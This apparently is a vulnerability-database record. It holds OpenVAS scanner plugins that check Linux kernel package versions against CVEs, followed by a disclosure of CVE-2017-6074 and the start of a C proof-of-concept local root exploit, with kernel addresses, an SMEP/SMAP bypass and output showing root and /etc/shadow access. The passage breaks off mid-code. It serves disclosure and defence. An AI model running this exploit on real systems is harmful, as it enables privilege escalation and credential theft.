exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1021-raspi2\", ver:\"4.8.0-1021.24\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.8.0.1021.24\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-01T00:00:00", "id": "OPENVAS:1361412562310842972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842972", "type": "openvas", "title": "Ubuntu Update for linux USN-3146-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3146-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842972\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 05:39:23 +0100 (Thu, 01 Dec 2016)\");\n script_cve_id(\"CVE-2016-9644\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8658\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3146-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the __get_user_asm_ex\n implementation in the Linux kernel for x86/x86_64 contained extended asm\n statements that were incompatible with the exception table. A local attacker\n could use this to gain administrative privileges. (CVE-2016-9644)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during a\nsetxattr call. A local attacker could use this to possibly elevate group\nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the\nLinux kernel did not properly validate control messages. A local attacker\ncould use this to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-7425)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom\nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-8658)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3146-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3146-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-generic\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-generic-lpae\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-lowlatency\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc-e500mc\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc-smp\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc64-emb\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc64-smp\", ver:\"4.4.0-51.72\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.51.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-01T00:00:00", "id": "OPENVAS:1361412562310842964", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842964", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3146-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3146-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842964\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 05:39:01 +0100 (Thu, 01 Dec 2016)\");\n script_cve_id(\"CVE-2016-9644\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8658\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3146-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3146-1 fixed vulnerabilities in the Linux\n kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for\n the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n 14.04 LTS.\n\nIt was discovered that the __get_user_asm_ex implementation in the Linux\nkernel for x86/x86_64 contained extended asm statements that were\nincompatible with the exception table. A local attacker could use this to\ngain administrative privileges. (CVE-2016-9644)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during a\nsetxattr call. A local attacker could use this to possibly elevate group\nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the\nLinux kernel did not properly validate control messages. A local attacker\ncould use this to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-7425)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom\nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-8658)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3146-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3146-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-generic\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-generic-lpae\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-lowlatency\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc-e500mc\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc-smp\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc64-emb\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-51-powerpc64-smp\", ver:\"4.4.0-51.72~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-virtual-lts-xenial\", ver:\"4.4.0.51.38\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9806", "CVE-2016-8666", "CVE-2016-10088", "CVE-2016-9555", "CVE-2016-9576", "CVE-2016-9588", "CVE-2016-7039", "CVE-2016-3672"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171001", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1001)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1001\");\n script_version(\"2020-01-23T10:42:43+0000\");\n script_cve_id(\"CVE-2016-10088\", \"CVE-2016-3672\", \"CVE-2016-8666\", \"CVE-2016-9555\", \"CVE-2016-9576\", \"CVE-2016-9588\", \"CVE-2016-9806\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:42:43 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:42:43 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1001)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1001\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1001\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1001 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arch/x86/kvm/vmx.c in the Linux kernel through 4.9 mismanages the #BP and #OF exceptions, which allows guest OS users to cause a denial of service (guest OS crash) by declining to handle an exception thrown by an L2 guest.(CVE-2016-9588)\n\nThe IP stack in the Linux kernel before 4.6 allows remote attackers to cause a denial of service (stack consumption and panic) or possibly have unspecified other impact by triggering use of the GRO path for packets with tunnel stacking, as demonstrated by interleaved IPv4 headers and GRE headers, a related issue to CVE-2016-7039.(CVE-2016-8666)\n\nThe blk_rq_map_user_iov function in block/blk-map.c in the Linux kernel before 4.8.14 does not properly restrict the type of iterator, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device.(CVE-2016-9576)\n\nRace condition in the netlink_dump function in net/netlink/af_netlink.c in the Linux kernel before 4.6.3 allows local users to cause a denial of service (double free) or possibly have unspecified other impact via a crafted application that makes sendmsg system calls, leading to a free operation associated with a new dump that started earlier than anticipated.(CVE-2016-9806)\n\nThe sg implementation in the Linux kernel through 4.9 does not properly restrict write operations in situations where the KERNEL_DS option is set, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device, related to block/bsg.c and drivers/scsi/sg.c. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-9576.(CVE-2016-10088)\n\nA flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash. (CVE-2016-9555)\n\nThe arch_pick_mmap_layout function in arch/x86/mm/mmap.c in the Linux kernel through 4.5.2 does not properly randomize the legacy base address, which makes it easier for local users to defeat the intended restrictions on the ADDR_NO_RANDOMIZE flag, and bypass the ASLR protection mechanism for a setuid or setgid program, by disabling stack-consumption resource limits.(CVE-2016-3672)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.46.1.111\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:23", "description": "This is an announcement about CVE-2017-6074 [1] which is a double-free\r\nvulnerability I found in the Linux kernel. It can be exploited to gain\r\nkernel code execution from an unprivileged processes.\r\n\r\nFixed on Feb 17, 2017:\r\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4\r\n\r\nThe oldest version that was checked is 2.6.18 (Sep 2006), which is\r\nvulnerable. However, the bug was introduced before that, probably in\r\nthe first release with DCCP support (2.6.14, Oct 2005).\r\n\r\nThe kernel needs to be built with CONFIG_IP_DCCP for the vulnerability\r\nto be present. A lot of modern distributions enable this option by\r\ndefault.\r\n\r\nThe bug was found with syzkaller [2].\r\n\r\n### Bug details\r\n\r\nIn the current DCCP implementation an skb for a DCCP_PKT_REQUEST\r\npacket is forcibly freed via __kfree_skb in dccp_rcv_state_process if\r\ndccp_v6_conn_request successfully returns [3].\r\n\r\nHowever, if IPV6_RECVPKTINFO is set on a socket, the address of the\r\nskb is saved to ireq->pktopts and the ref count for skb is incremented\r\nin dccp_v6_conn_request [4], so skb is still in use. Nevertheless, it\r\nstill gets freed in dccp_rcv_state_process.\r\n\r\nThe fix is to call consume_skb, which accounts for skb->users,\r\ninstead of doing goto discard and therefore calling __kfree_skb.\r\n\r\nTo exploit this double-free, it can be turned into a use-after-free:\r\n\r\n// The first free:\r\nkfree(dccp_skb)\r\n// Another object allocated on the same place as dccp_skb:\r\nsome_object = kmalloc()\r\n// The second free, effectively frees some_object\r\nkfree(dccp_skb)\r\n\r\nAs this point we have a use-after-free on some_object. An attacker can\r\ncontrol what object that would be and overwrite it's content with\r\narbitrary data by using some of the kernel heap spraying techniques.\r\nIf the overwritten object has any triggerable function pointers, an\r\nattacker gets to execute arbitrary code within the kernel.\r\n\r\nI'll publish an exploit in a few days, giving people time to update.\r\n\r\nNew Ubuntu kernels are out so please update as soon as possible.\r\n\r\n### Timeline\r\n\r\n2017-02-15: Bug reported to security () kernel org\r\n2017-02-16: Patch submitted to netdev\r\n2017-02-17: Patch committed to mainline kernel\r\n2017-02-18: Notification sent to linux-distros\r\n2017-02-22: Public announcement", "published": "2017-02-23T00:00:00", "type": "seebug", "title": "Linux kernel DCCP double-free vulnerability\uff08CVE-2017-6074\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6074"], "modified": "2017-02-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92700", "id": "SSV:92700", "sourceData": "\n //\r\n// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471\r\n//\r\n// A proof-of-concept local root exploit for CVE-2017-6074.\r\n// Includes a semireliable SMAP/SMEP bypass.\r\n// Tested on 4.4.0-62-generic #83-Ubuntu kernel.\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\r\n//\r\n// Usage:\r\n// $ gcc poc.c -o pwn\r\n// $ ./pwn\r\n// [.] namespace sandbox setup successfully\r\n// [.] disabling SMEP & SMAP\r\n// [.] scheduling 0xffffffff81064550(0x406e0)\r\n// [.] waiting for the timer to execute\r\n// [.] done\r\n// [.] SMEP & SMAP should be off now\r\n// [.] getting root\r\n// [.] executing 0x402043\r\n// [.] done\r\n// [.] should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// [!] don't kill the exploit binary, the kernel will crash\r\n// # cat /etc/shadow\r\n// ...\r\n// daemon:*:17149:0:99999:7:::\r\n// bin:*:17149:0:99999:7:::\r\n// sys:*:17149:0:99999:7:::\r\n// sync:*:17149:0:99999:7:::\r\n// games:*:17149:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n \r\n#include <sched.h>\r\n \r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n \r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <netinet/if_ether.h>\r\n \r\n#define SMEP_SMAP_BYPASS 1\r\n \r\n// Needed for local root.\r\n#define COMMIT_CREDS 0xffffffff810a2840L\r\n#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L\r\n#define SHINFO_OFFSET 1728\r\n \r\n// Needed for SMEP_SMAP_BYPASS.\r\n#define NATIVE_WRITE_CR4 0xffffffff81064550ul\r\n#define CR4_DESIRED_VALUE 0x406e0ul\r\n#define TIMER_OFFSET (728 + 48 + 104)\r\n \r\n#define KMALLOC_PAD 128\r\n#define KMALLOC_WARM 32\r\n#define CATCH_FIRST 6\r\n#define CATCH_AGAIN 16\r\n#define CATCH_AGAIN_SMALL 64\r\n \r\n// Port is incremented on each use.\r\nstatic int port = 11000;\r\n \r\nvoid debug(const char *msg) {\r\n/*\r\n char buffer[32];\r\n snprintf(&buffer[0], sizeof(buffer), \"echo '%s' > /dev/kmsg\\n\", msg);\r\n system(buffer);\r\n*/\r\n}\r\n \r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n \r\nstruct ubuf_info {\r\n uint64_t callback; // void (*callback)(struct ubuf_info *, bool)\r\n uint64_t ctx; // void *\r\n uint64_t desc; // unsigned long\r\n};\r\n \r\nstruct skb_shared_info {\r\n uint8_t nr_frags; // unsigned char\r\n uint8_t tx_flags; // __u8\r\n uint16_t gso_size; // unsigned short\r\n uint16_t gso_segs; // unsigned short\r\n uint16_t gso_type; // unsigned short\r\n uint64_t frag_list; // struct sk_buff *\r\n uint64_t hwtstamps; // struct skb_shared_hwtstamps\r\n uint32_t tskey; // u32\r\n uint32_t ip6_frag_id; // __be32\r\n uint32_t dataref; // atomic_t\r\n uint64_t destructor_arg; // void *\r\n uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n \r\nstruct ubuf_info ui;\r\n \r\nvoid init_skb_buffer(char* buffer, void *func) {\r\n memset(&buffer[0], 0, 2048);\r\n \r\n struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];\r\n \r\n ssi->tx_flags = 0xff;\r\n ssi->destructor_arg = (uint64_t)&ui;\r\n ssi->nr_frags = 0;\r\n ssi->frag_list = 0;\r\n \r\n ui.callback = (unsigned long)func;\r\n}\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid init_timer_buffer(char* buffer, void *func, unsigned long arg) {\r\n memset(&buffer[0], 0, 2048);\r\n \r\n struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];\r\n \r\n 